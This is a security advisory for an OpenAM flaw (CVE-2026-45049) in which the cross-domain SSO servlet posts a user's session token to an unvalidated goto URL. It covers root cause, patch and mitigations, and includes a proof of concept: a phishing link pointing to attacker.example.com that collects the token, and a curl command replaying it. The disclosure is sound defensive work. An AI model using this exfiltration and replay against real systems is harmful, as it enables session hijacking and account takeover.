high · 8.3CVE-2026-45049Jun 26, 2026

CVE-2026-45049: OpenAM CDCServlet Session Token Exfiltration via Unvalidated goto Redirect

Pranav Khune
Penetration Testing Team Lead, SecureLayer7

OpenAM's cross-domain SSO servlet will POST a logged-in user's raw session token to any URL supplied in the goto parameter, letting an attacker steal the session by tricking the victim into visiting a

Packageorg.openidentityplatform.openam:openam-federation
Ecosystemmaven
Affected<= 16.0.6
Fixed in16.1.1
CVE-2026-45049: OpenAM CDCServlet Session Token Exfiltration via Unvalidated goto Redirect

The problem

The CDCServlet in OpenAM's CDSSO component accepts a goto request parameter and uses it as the destination for a form POST that carries the user's raw iPlanetDirectoryPro session token.

The servlet performed no validation of that destination URL against a trusted-origins list, so an attacker-controlled URL was accepted as readily as a legitimate policy agent. Any authenticated user who visits a crafted link hands their live session credential to the attacker.

Proof of concept

http
# 1. Attacker sends victim this link (e.g. via phishing)
GET https://openam.example.com/openam/cdcservlet?goto=https://attacker.example.com/collect HTTP/1.1
Host: openam.example.com
Cookie: iPlanetDirectoryPro=<victim-session-token>

# CDCServlet responds with an auto-submitting form that POSTs to the attacker URL.
# Attacker's server receives:
POST /collect HTTP/1.1
Host: attacker.example.com
Content-Type: application/x-www-form-urlencoded

Liberty=...&goto=https%3A%2F%2Fattacker.example.com%2Fcollect&...token=AQIC5wM2LY4Sfcx...

# 2. Attacker replays the token
curl -s https://openam.example.com/openam/identity/json/attributes \
  -H 'Cookie: iPlanetDirectoryPro=AQIC5wM2LY4Sfcx...'

CDCServlet generated an HTML auto-POST form targeting the raw goto URL without running it through OpenAM's existing RedirectUrlValidator (the Validation Service that already guards goto redirects on the normal auth path). The root cause is CWE-201: sensitive data (the session token) is included in data sent to a destination that was never verified to be trustworthy.

The 16.1.1 patch wires CDCServlet's goto destination through the same URL allowlist check used everywhere else in the codebase, so a goto pointing outside the configured valid-goto-resources list is now rejected before the POST is constructed. Public PoC not formally published; payload derived from advisory description and CDCServlet source behavior confirmed in multiple secondary analyses.

The fix

Upgrade to OpenAM Community Edition 16.1.1 or later. If upgrading is not immediately possible, disable CDSSO entirely, or enforce network-level controls that prevent the CDCServlet endpoint from reaching arbitrary external hosts. After upgrading, configure the Validation Service (Access Control > realm > Services > Validation Service) with an explicit allowlist of trusted policy agent URLs so the new check has a concrete list to enforce against.

Reporter not attributed.

References: [1][2]